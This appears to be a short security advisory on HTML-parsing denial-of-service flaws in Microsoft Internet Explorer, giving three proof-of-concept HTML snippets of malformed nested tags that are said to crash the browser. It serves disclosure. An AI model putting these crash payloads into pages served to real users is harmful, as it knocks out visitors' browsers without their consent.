Microsoft Internet Explorer HTML Parsing Denial of Service Vulnerabilities

Microsoft Internet Explorer HTML Parsing Denial of Service Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:

Crash 1:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
> </samp></colgroup><ul><font><menu> <code> <var>
> <sub><h2></fieldset>
> </kbd></frameset>
> </ins></map></noframes>
> </isindex>
> </code>
> </div></title>
> </del></var><isindex>
> <i>

Crash 2:
> <acronym><dd><h5><applet></caption></applet><li></h1>

Crash 3:
> <table datasrc=".">